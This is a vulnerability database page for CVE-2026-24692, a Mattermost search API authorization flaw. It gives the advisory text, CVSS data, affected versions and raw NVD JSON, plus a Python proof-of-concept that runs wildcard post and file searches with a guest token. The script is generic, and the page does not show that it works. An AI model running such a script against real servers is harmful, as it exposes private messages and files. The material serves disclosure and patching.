CVE-2026-24692

Description

Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to properly enforce read permissions in search API endpoints which allows guest users without read permissions to access posts and files in channels via search API requests. Mattermost Advisory ID: MMSA-2025-00554

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE

Mattermost 11.3.x <= 11.3.0

Mattermost 11.2.x <= 11.2.2

Mattermost 10.11.x <= 10.11.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2026-24692 PoC - Mattermost Search API Authorization Bypass
# Target: Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10

TARGET_URL = "https://your-mattermost-server.com"
API_TOKEN = "your-guest-user-token"

def exploit_search_api():
    """
    This PoC demonstrates the authorization bypass in Mattermost search API.
    A guest user without read permissions can access posts in private channels.
    """
    headers = {
        "Authorization": f"Bearer {API_TOKEN}",
        "Content-Type": "application/json"
    }
    
    # Search for posts in unauthorized channels
    search_payload = {
        "terms": "*",  # Wildcard search to find all posts
        "is_or_search": False,
        "include_deleted_channels": False,
        "team_id": "target-team-id"
    }
    
    # Exploit: Bypass permission check by searching all channels
    endpoint = f"{TARGET_URL}/api/v4/posts/search"
    
    try:
        response = requests.post(endpoint, headers=headers, json=search_payload, verify=False)
        
        if response.status_code == 200:
            data = response.json()
            # Attacker can access posts from channels they shouldn't have access to
            posts = data.get("posts", {})
            print(f"[+] Successfully retrieved {len(posts)} posts via unauthorized access")
            return posts
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return None
    except Exception as e:
        print(f"[-] Error: {e}")
        return None

def exploit_file_search():
    """
    File search API also vulnerable to authorization bypass
    """
    headers = {
        "Authorization": f"Bearer {API_TOKEN}",
        "Content-Type": "application/json"
    }
    
    file_search_payload = {
        "terms": "*",
        "team_id": "target-team-id"
    }
    
    endpoint = f"{TARGET_URL}/api/v4/files/search"
    
    try:
        response = requests.post(endpoint, headers=headers, json=file_search_payload, verify=False)
        
        if response.status_code == 200:
            data = response.json()
            print(f"[+] File search bypass successful - retrieved {len(data.get('file_infos', []))} files")
            return data
    except Exception as e:
        print(f"[-] Error: {e}")
        return None

if __name__ == "__main__":
    print("[*] CVE-2026-24692 Mattermost Search API Authorization Bypass")
    print("[*] Target: Mattermost <= 11.3.0, <= 11.2.2, <= 10.11.10")
    exploit_search_api()
    exploit_file_search()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-24692
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-24692
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-24692/
[4] VulDB https://vuldb.com/cve/CVE-2026-24692
[5] https://mattermost.com/security-updates

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-24692", "sourceIdentifier": "[email protected]", "published": "2026-03-16T15:16:21.290", "lastModified": "2026-03-18T13:54:50.950", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to properly enforce read permissions in search API endpoints which allows guest users without read permissions to access posts and files in channels via search API requests. Mattermost Advisory ID: MMSA-2025-00554"}, {"lang": "es", "value": "Las versiones de Mattermost 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 no aplican correctamente los permisos de lectura en los puntos finales de la API de búsqueda, lo que permite a usuarios invitados sin permisos de lectura acceder a publicaciones y archivos en canales a través de solicitudes a la API de búsqueda. ID de Aviso de Mattermost: MMSA-2025-00554"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.11", "matchCriteriaId": "B6E5F368-358C-429B-8F04-3C8DF4A71A91"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.2.0", "versionEndExcluding": "11.2.3", "matchCriteriaId": "7F64C167-943D-4F3F-9374-BCC8DECB3881"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.3.0", "versionEndExcluding": "11.3.1", "matchCriteriaId": "945A6E29-209F-4992-8692-BEF63DCB6B98"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}